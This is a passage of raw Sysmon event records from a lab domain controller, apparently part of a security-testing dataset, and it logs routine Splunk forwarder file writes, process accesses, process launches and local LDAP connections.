Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0BD2D8EA77BF2600221AA719489448A5,SHA256=5AAECFDDB25082DE75F432452B982EF178026D4D712A00AE84F6809EB67A8514,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024082Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:49.715{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C5EEA6FA2DB458882500C515B2EDB5D,SHA256=CAEDAFE92D8D49BEEAB75C430C1D7DE0D4A94197082D4823886E8322A501AC30,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024083Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:50.741{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D7A26F584578068AA4D4BA3702FC3F5C,SHA256=BD294E19252A22AD089980F04649F8E3351121E882D94A0E83DB6EC66ED4753E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024085Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:51.741{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1AD3E33D8D698292885E33FEC5B7FD81,SHA256=FBF2AF790601044C6C1AD91F9942E43474B3847B406371A257D38BF0B61362E4,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000024084Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:49.301{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61476-false10.0.1.12-8000- 23542300x800000000000000024086Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:52.772{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E30FAC9CA45B4C79C5E4C447BAE57DE,SHA256=28792841DEF4192CBC68B84D4073A0C813CB7B94B4EF34213805E89BCFA38FE6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024097Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:53.788{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C27F51981053778772FEBA3076589D59,SHA256=B32267E30AF31DF47149BEAD44F3289545E76A442D3CF78AA20723B83FCD78E2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024096Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:53.585{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2EAA6A38F4200627AE0CD9678794235B,SHA256=B56422D4289AC07FFEACCC0122A29D69BB38C7AAF936B6DE2A9A612FB0F14170,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024095Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:53.585{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EFE9DF37BF89A5AF1A4B722088208D6F,SHA256=DE940DD51739BC41CEF2410185E3F482017B67B5BE7735FA1D224392BCB8716F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000024094Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:53.147{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A2A9-60D3-1706-00000000CF01}5516C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024093Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:53.147{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024092Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:53.147{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024091Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:53.147{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024090Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:53.147{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024089Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:53.147{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A2A9-60D3-1706-00000000CF01}5516C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000024088Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:53.147{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A2A9-60D3-1706-00000000CF01}5516C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000024087Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:53.008{4DB9351A-A2A9-60D3-1706-00000000CF01}5516C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000024118Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:54.944{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2EAA6A38F4200627AE0CD9678794235B,SHA256=B56422D4289AC07FFEACCC0122A29D69BB38C7AAF936B6DE2A9A612FB0F14170,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000024117Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:54.913{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A2AA-60D3-1906-00000000CF01}2212C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024116Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:54.913{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024115Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:54.913{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024114Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:54.913{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024113Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:54.913{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024112Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:54.913{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A2AA-60D3-1906-00000000CF01}2212C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000024111Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:54.913{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A2AA-60D3-1906-00000000CF01}2212C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000024110Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:54.789{4DB9351A-A2AA-60D3-1906-00000000CF01}2212C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000024109Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:54.788{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=676A5D31D29072E3126831D41390DF8F,SHA256=7918AEFE08FE4E46EDA2BE37DB8E6263A89530256E451BF03069457319878916,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000024108Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:54.257{4DB9351A-A2A9-60D3-1806-00000000CF01}71123928C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000024107Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:52.608{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local61477-true0:0:0:0:0:0:0:1win-dc-663.attackrange.local389ldap 354300x800000000000000024106Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:52.608{4DB9351A-9DEA-60D3-2B00-00000000CF01}3024C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local61477-true0:0:0:0:0:0:0:1win-dc-663.attackrange.local389ldap 10341000x800000000000000024105Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:54.038{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A2A9-60D3-1806-00000000CF01}7112C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024104Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:54.038{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024103Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:54.038{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024102Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:54.038{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024101Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 